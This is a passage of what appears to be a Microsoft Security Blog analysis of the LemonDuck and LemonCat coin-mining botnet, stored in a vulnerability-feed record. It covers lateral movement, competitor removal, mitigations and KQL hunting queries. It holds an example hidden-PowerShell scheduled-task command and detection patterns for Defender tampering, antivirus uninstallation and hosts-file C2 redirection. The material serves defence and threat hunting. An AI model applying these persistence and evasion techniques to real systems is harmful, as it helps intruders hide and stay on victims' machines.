The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These C2 domains use a variety of names, with the .com and .ag top-level domains both observed.\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. 
It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. 
The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. To explore up to 30 days' worth of raw data to inspect events in your network and locate potential LemonDuck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab and select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail them to contacts of the mailboxes on impacted machines. Additionally, checks whether attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change, as could the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n```kusto\nEmailEvents\n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',\n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')\n| where AttachmentCount >= 1\n```\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with the name \u201cSIEX\u201d, which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n```kusto\nDeviceEvents\n| where ActionType == \"PowerShellCommand\"\n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"\n```\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of known LemonDuck keyword variations in command lines initiated by PowerShell processes. All results should reflect LemonDuck behavior; however, there are existing variants of LemonDuck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n```kusto\nDeviceProcessEvents\n| where InitiatingProcessFileName == \"powershell.exe\"\n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")\n```\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n```kusto\nDeviceProcessEvents\n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\")\n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp\n```\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where _WMIC.exe_ queries installed products whose names match a security vendor or contain \u201cSecurity\u201d or \u201cAntiVirus\u201d and calls uninstall on them non-interactively, which is how LemonDuck attempts to remove competing security products. Uninstall attempts against products that are not deployed in the environment are a particularly strong signal. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n```kusto\nDeviceProcessEvents\n| where InitiatingProcessFileName =~ \"wmic.exe\"\n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\")\n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")\n```\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances are included to account for environments with potential false positives. The most general versions are intended to account for minor script or component changes such as changing to utilize non-.bin files and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled task creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks, or for a semi-unique pattern of task creation: LemonDuck also launches hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and a more specific version, allowing the detection of this technique if other activity groups were to utilize it. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
